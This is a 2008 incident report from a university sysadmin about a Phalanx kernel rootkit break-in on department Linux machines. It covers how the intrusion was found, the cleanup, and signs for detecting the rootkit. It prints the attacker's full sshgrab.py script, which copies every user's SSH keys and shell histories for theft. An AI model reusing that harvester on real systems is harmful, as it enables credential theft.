What Happened?

Our systems were broken into sometime on July 24th. I discovered the breakin on the 28th. A few of you have asked me to describe what happened, so the following narrative is the best I can do.

On Monday, July 28th, I checked administrative mail messages on hep and found some weird files located on a couple of other nodes in the cluster. (I don't remember which nodes.) The messages were showing a directory /etc/khubd.p2 installed in a few places. At first, it looked empty, but then I found some hidden files, called .p2rc, .phalanx2 and .sniff. I googled for phalanx2 and found nothing, but the file named .sniff made me leery. Again, I don't remember which nodes I found these on, but they were across groups. So I decided to search all nodes for the /etc/khubd.p2 directory. I found it first on hep.

drwxrwxrwx    2 root     root         4096 Jul 28 14:29 ./
drwxr-xr-x   94 root     root        12288 Jul 28 15:05 ../
-rw-r--r--    1 root     root         1356 Jul 24 19:58 .p2rc
-rwxr-xr-x    1 root     root       561032 Jul 24 19:58 .phalanx2*
-rwxr-xr-x    1 root     root         7637 Jul 28 15:04 .sniff*
-rw-r--r--    1 root     53746        1063 Jul 24 20:56 sshgrab.py
This made me very nervous and I figured something strange was happening and that we had probably been broken into. I started looking at the processes running and notices a telnet session open to lx2.hep.uiuc.edu. This seemed weird and when I asked the user who owned the process, he knew nothing about it. I killed the telnet session and started looking for other odd things. Here, I came back to the .sniff file and realized that the size had changed. So there was a current process running that was writing to this file. The normal command to use here would be lsof. I ran lsof .sniff and got nothing, which was very weird. I then looked at all the processes currently running to see if anything looked unusual, but they didn't.

A fellow admin took a closer look at the sshgrab.py file and noted that it looked like it was basically dumping the .ssh directory for each user to /dev/shm. He also pointed out that we should be able to kill whatever process was running, by rebooting the computer, which sounded like a good idea. The phantom process was also running on cdf46, so I decided to reboot that computer. Unfortunately, when it came back up, the .sniff file was still growing. I now knew for sure that I needed to reinstall the os, but wanted to see if I could figure out how this happened in the first place.

The timestamp of the directories and files was July 24th around 8pm. I looked at who was logged in during that time, and didn't see anything unusual. I also didn't see anything very strange in the logs, though I just gave them a quick look. My admin messages showing the directory, didn't come until Saturday, so the program "might" not have been running until Saturday, but I'm not positive of that. Saturday's messages, which I didn't read until Monday, were the first clue I had that something was wrong. Either way, I haven't been able to figure out how this happened and probably never will. I did replace the system disk on hep, so I do have the original disk as it appeared on Monday afternoon.

A more thorough examination of the files led to a user who has not been logging in much. Looking more closely at that account, we noticed that his .ssh/known_hosts and .ssh/authorized_keys files had changed at the time of the breakin. We tracked the user down to ask if (s)he had logged in during that time and (s)he had not. So it looks like the original breakin was due to a compromised password. The key added to authorized_keys did not have a host attached to it, but it's shown here:

ssh-dss AAAAB3NzaC1kc3MAAACBAKn4aRh3dDdiVMbJ/Q4bZzbqZIVNM+JZXAFv2IemCzXmfOhQxu9ZKqJUMw+CD3ilyXizQwQdf6PGyKrNrNJ5MGmjlN9r9dBD6tl8llkNn5UqxoDzqHPENvheLPOlbNqJ1Wvf/2gMk3udsMsBDp2JQX1lgSAMNFkaPRBXY1AuA4uNAAAAFQDyoi0J5TjS+2V6Lk6+Yme72v01YwAAAIAi+D3SSFn+8TKhGS8xCz+kL3lRm3qTKwPwlWKPyw1htPi5O9WciIqZITbyg3MW39J6s6wDeXE1CjFKWsqb5BIG7KW2QsZkCHgP8u1R8jltzyrUwK1xo9TBm8ntwkIJrZpSn/dtflX66q0/kC+nlKosixuXrCA87GHADzOnnjNFXAAAAIA6rn+mRBULCtsT65hy1ZjZ2s7islO0FTOSTBhHj+OCyi/Rtj6qc4c2zRyb7kx4zD692MjBukcGVV9fcHirxuHQGklhqZZ06iivhkEYstQCPUnIQSLpIlVlIA56gfuwdvdKwliboYsFsM/Vg5PAbotoI2gJi9e3EcC3HMIFxITd7Q==
And the only change in known_hosts was for the node bonner-pcs2.rice.edu.

At this time, I wanted to get started reinstalling computers to minimize our down time. I first reinstalled hep, then tux and finally kenny. This meant that all the users and their home directories were mounted and available to sendmail. I then set up all the users accounts and immediately disabled them all. We were receiving mail fine, just no one was able to read it at this point. I also renamed each user's .ssh directory to .ssh.DONOTUSE. There's a very good chance that keys were copied and I want to make sure everyone knows that.

Since then, I've set up sendmail, dovecot (imap server) and squirrelmail (webmail) to allow users to read/send mail. As I was reinstalling hep, I upgraded to RHEL5, as this seemed as good a time as any to do so. One problem I had was pine would not install. Some of you will have noticed that we have alpine now, instead of pine. I've heard that some keyboard shortcuts don't work properly in alpine and that it's very slow to save messages. When I get some more time, I'll see about getting a different version of alpine or just a plain version of pine.

If you have any problems or notice anything on hep that isn't quite right, please let me know. I may not get to it right away, but I'm sure that in my haste, I probably missed installing or configuring some important items.

I am now hanging around in my office waiting for users to drop by to get their new passwords. I've also been reinstalling other nodes that showed traces of the keystroke logger.

One thing to note, the .sniff file was found on all the computers that were reinstalled, however it was empty on a number of them. So, I'm guessing that the keyboard logger never ran on those. As an example, I have checked the .sniff file on hepblog and it was empty. I know that the picosecond blog, which is hosted on this computer, was updated since the 24th, so I'm fairly certain that the program was only taking things typed into a terminal or ssh window. It was not copying any keystrokes that came through a browser. I also tried for myself on hepelog. I watched the .sniff file and wrote some text into a new log entry. Nothing appeared in the .sniff file.

While I was reinstalling, I did a more thorough google search for the .phalanx2 program and found a program called phalanx-b6. I'm fairly certain that this is the rootkit that was installed on our computers. Here is the description:

Phalanx is a self-injecting kernel rootkit designed for the Linux 2.6 branch that does not use the now-disabled 
/dev/kmem device. Features include file hiding, process hiding, socket hiding, a tty sniffer, 
a tty connectback-backdoor, and auto injection on boot.
And, if anyone cares, here is the sshgrab.py program:
#!/usr/bin/python
import os, sys

p = os.popen("getent passwd")

passwd = p.readlines()
p.close()

host = os.uname()[1]

os.system("mkdir /dev/shm/%s;chmod 777 /dev/shm/%s" % (host,host))


for user in [(x.split(":")[0],x.split(":")[-2],x.split(":")[2]) for x in passwd]:
        if os.fork() == 0:
                print "setting uid = %s/%s" % (user[0],user[2])
                os.setuid(int(user[2]))
                try:
                        os.stat("%s/.ssh" % user[1])
                        print "%s/.ssh -> /dev/shm/%s" % (user[1],host)
                        os.system("cp -r %s/.ssh /dev/shm/%s/%s" % (user[1],host,user[0]))
                        for x in ["bash", "sh", "kshrc", "zsh", "mysql"]:
                                os.system("cp %s/.%s_history /dev/shm/%s/%s 2>/dev/null" % (user[1]
,x,host,user[0]))
                except: pass
                sys.exit(0)
        else:
                os.wait()

os.system("cd /dev/shm;tar -cf %s.tar %s;rm -rf %s;gzip %s.tar;ls -l /dev/shm/%s.tar.gz" % (host,ho
st,host,host,host))

print "done"
I've been in contact with another guy and he gave me the following info:
I was able to get the rootkit to run on one of our test boxes. There
are at least two hints, that there is a running version of this rootkit
on your system:

o There is a hidden process which is neither in the listing of 'ps'
 nor of 'ls /proc'. The process reacts to signals though and its
 directory in /proc can be accessed.

o If the attacker tried to hide in directory '/path' a subdirectory
 '/path/secret' then the link count of '/path' will be to high. e.g.:

 user@linux:/tmp$ ls -al | grep "^d"
 drwxrwxrwt  7 root root 296 2008-08-01 15:05 .
 drwxr-xr-x 32 root root 864 2007-12-23 12:58 ..
 drwxrwxrwt  2 root root  72 2008-07-08 08:23 .font-unix
 drwx------  2 user user  80 2008-07-25 23:16 ssh-eToaww5944
 drwx------  2 user user  80 2008-07-08 08:24 ssh-wMQEEV1371
 drwxrwxrwt  2 root root  72 2008-07-08 08:23 .X11-unix
 user@linux:/tmp$

 The link count should be 6 and not 7. There is a hidden subdir.
He also told me that this breakin looks like a newer version of the phalanx toolkit, available on packetstorm.

Mary Heintz
Updated: 4 August 2008